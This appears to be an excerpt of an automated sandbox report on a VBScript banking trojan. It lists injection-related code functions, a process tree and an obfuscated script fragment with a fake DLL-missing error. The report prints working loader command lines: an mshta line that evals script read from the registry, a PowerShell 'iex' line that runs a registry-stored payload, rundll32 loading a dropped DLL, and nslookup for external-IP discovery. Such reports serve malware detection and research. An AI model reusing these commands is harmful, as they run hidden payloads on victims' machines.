                    Source: C:\Windows\System32\control.exeCode function: 38_2_000CA9F838_2_000CA9F8
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000CBA7438_2_000CBA74
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000B9AD838_2_000B9AD8
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000D730C38_2_000D730C
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000CD32838_2_000CD328
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000B134838_2_000B1348
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C834038_2_000C8340
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000D435438_2_000D4354
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000B4B6038_2_000B4B60
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000DA3A438_2_000DA3A4
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000D4BA038_2_000D4BA0
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000BABDC38_2_000BABDC
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000D940838_2_000D9408
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C448438_2_000C4484
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000B74A438_2_000B74A4
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C950038_2_000C9500
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C559C38_2_000C559C
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C5DBC38_2_000C5DBC
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000D4DE038_2_000D4DE0
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C1DF438_2_000C1DF4
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000B361038_2_000B3610
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C668438_2_000C6684
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000D6EA038_2_000D6EA0
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000D06B438_2_000D06B4
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000CC6C438_2_000CC6C4
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C2EC038_2_000C2EC0
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000D5ED838_2_000D5ED8
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000D2EF838_2_000D2EF8
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000B76F438_2_000B76F4
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000CA79038_2_000CA790
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000CF7B438_2_000CF7B4
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8ADB94840_2_00000195D8ADB948
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8ADB23040_2_00000195D8ADB230
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8ADA3A440_2_00000195D8ADA3A4
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AD4BA040_2_00000195D8AD4BA0
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8ACF7B440_2_00000195D8ACF7B4
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8ACA79040_2_00000195D8ACA790
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8ABABDC40_2_00000195D8ABABDC
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8ACD32840_2_00000195D8ACD328
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AD2EF840_2_00000195D8AD2EF8
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AD730C40_2_00000195D8AD730C
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AB4B6040_2_00000195D8AB4B60
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AC834040_2_00000195D8AC8340
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AD435440_2_00000195D8AD4354
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AB134840_2_00000195D8AB1348
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AB74A440_2_00000195D8AB74A4
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AC448440_2_00000195D8AC4484
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AD88B840_2_00000195D8AD88B8
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AC70C840_2_00000195D8AC70C8
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AC782040_2_00000195D8AC7820
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AB100040_2_00000195D8AB1000
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AD340040_2_00000195D8AD3400
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AD940840_2_00000195D8AD9408
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AC559C40_2_00000195D8AC559C
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AD4DE040_2_00000195D8AD4DE0
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AC1DF440_2_00000195D8AC1DF4
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AC5DBC40_2_00000195D8AC5DBC
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AC012440_2_00000195D8AC0124
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AC950040_2_00000195D8AC9500
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AB90FC40_2_00000195D8AB90FC
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AD516440_2_00000195D8AD5164
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AC116440_2_00000195D8AC1164
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8ACE95C40_2_00000195D8ACE95C
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AC694440_2_00000195D8AC6944
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AB213840_2_00000195D8AB2138
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AC415040_2_00000195D8AC4150
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AD6EA040_2_00000195D8AD6EA0
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AD06B440_2_00000195D8AD06B4
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AC668440_2_00000195D8AC6684
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AB9AD840_2_00000195D8AB9AD8
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AD5ED840_2_00000195D8AD5ED8
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AB76F440_2_00000195D8AB76F4
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8ACC6C440_2_00000195D8ACC6C4
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AC2EC040_2_00000195D8AC2EC0
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8ACA9F840_2_00000195D8ACA9F8
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AB361040_2_00000195D8AB3610
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8ACBA7440_2_00000195D8ACBA74
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AEF5CC40_2_00000195D8AEF5CC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0557E6B4 CreateProcessAsUserA,21_2_0557E6B4
                    Source: 345678.vbsInitial sample: Strings found which are bigger than 50
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\fum.cpp 8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E540DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,21_2_00E540DC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E56EB3 GetProcAddress,NtCreateSection,memset,21_2_00E56EB3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E57666 NtMapViewOfSection,21_2_00E57666
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E58055 NtQueryVirtualMemory,21_2_00E58055
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0558B58C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,21_2_0558B58C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0558A71C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,21_2_0558A71C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_055737F6 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,21_2_055737F6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0558F7F5 NtQueryInformationProcess,21_2_0558F7F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0559079B GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,21_2_0559079B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05586657 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,21_2_05586657
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05580E3E NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,21_2_05580E3E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_055909D7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,21_2_055909D7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0558B878 GetProcAddress,NtCreateSection,memset,21_2_0558B878
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05585878 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,21_2_05585878
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0558A8F7 NtMapViewOfSection,21_2_0558A8F7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05588890 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,21_2_05588890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05579D36 NtGetContextThread,RtlNtStatusToDosError,21_2_05579D36
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_055855D6 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,21_2_055855D6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05580CEF NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,21_2_05580CEF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0557579C NtQuerySystemInformation,RtlNtStatusToDosError,21_2_0557579C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05580FBD memset,NtQueryInformationProcess,21_2_05580FBD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05575166 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,21_2_05575166
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0558FBB9 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,21_2_0558FBB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05590BAB NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,21_2_05590BAB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E8B90 NtMapViewOfSection,31_2_000002174F3E8B90
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E5B80 NtCreateSection,31_2_000002174F3E5B80
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3EE95C NtSetContextThread,NtUnmapViewOfSection,31_2_000002174F3EE95C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E1950 NtWriteVirtualMemory,31_2_000002174F3E1950
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3EE860 NtQueryInformationProcess,31_2_000002174F3EE860
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F20A4 NtQueryInformationToken,NtQueryInformationToken,31_2_000002174F3F20A4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3FA8F0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,31_2_000002174F3FA8F0
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000CE860 NtQueryInformationProcess,38_2_000CE860
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000D20A4 NtQueryInformationToken,NtQueryInformationToken,NtClose,38_2_000D20A4
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000DA8F0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,38_2_000DA8F0
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000DD110 RtlAllocateHeap,NtQueryInformationProcess,38_2_000DD110
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000CE95C NtSetContextThread,NtUnmapViewOfSection,NtClose,38_2_000CE95C
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C1950 NtWriteVirtualMemory,38_2_000C1950
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C5B80 NtCreateSection,38_2_000C5B80
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C8B90 NtMapViewOfSection,38_2_000C8B90
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000BFCA8 NtAllocateVirtualMemory,38_2_000BFCA8
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000B4580 NtReadVirtualMemory,38_2_000B4580
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000EF004 NtProtectVirtualMemory,NtProtectVirtualMemory,38_2_000EF004
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AD20A4 NtQueryInformationToken,NtQueryInformationToken,NtClose,40_2_00000195D8AD20A4
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8ACE860 NtQueryInformationProcess,40_2_00000195D8ACE860
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AEF004 NtProtectVirtualMemory,NtProtectVirtualMemory,40_2_00000195D8AEF004
                    Source: wyozc5bn.dll.35.drStatic PE information: No import functions for PE file found
                    Source: uitt4j30.dll.33.drStatic PE information: No import functions for PE file found
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210910Jump to behavior
                    Source: classification engineClassification label: mal100.bank.troj.evad.winVBS@29/21@5/1
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\345678.vbs'
                    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\345678.vbs'
                    Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: unknownProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline'
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES36.tmp' 'c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline'
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC9.tmp' 'c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP'
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                    Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76A9.bi1'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServerJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServerJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline'Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline'Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES36.tmp' 'c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP'Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC9.tmp' 'c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP'
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76A9.bi1'
                    Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
                    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E52102 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle,21_2_00E52102
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{DE70903F-A522-C073-1FF2-A9F4C346ED68}
                    Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{965F7604-FD91-382B-372A-81EC5BFE45E0}
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2424:120:WilError_01
                    Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{BA6EB6AE-D1AE-FC19-2B8E-95F08FA29924}
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_01
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{5AA57996-F134-9CA9-4B2E-B590AF42B9C4}
                    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: 345678.vbsStatic file information: File size 1397341 > 1048576
                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.pdb@ source: powershell.exe, 0000001F.00000002.777223322.0000021753319000.00000004.00000001.sdmp
                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.pdbXP+s source: powershell.exe, 0000001F.00000002.777223322.0000021753319000.00000004.00000001.sdmp
                    Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000001.00000003.535291067.000001763BDE4000.00000004.00000001.sdmp, fum.cpp.1.dr
                    Source: Binary string: ntdll.pdb source: rundll32.exe, 00000015.00000003.679916325.0000000005A50000.00000004.00000001.sdmp
                    Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000015.00000003.679916325.0000000005A50000.00000004.00000001.sdmp

                    Data Obfuscation:

                    barindex
                    VBScript performs obfuscated calls to suspicious functionsShow sources
                    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = 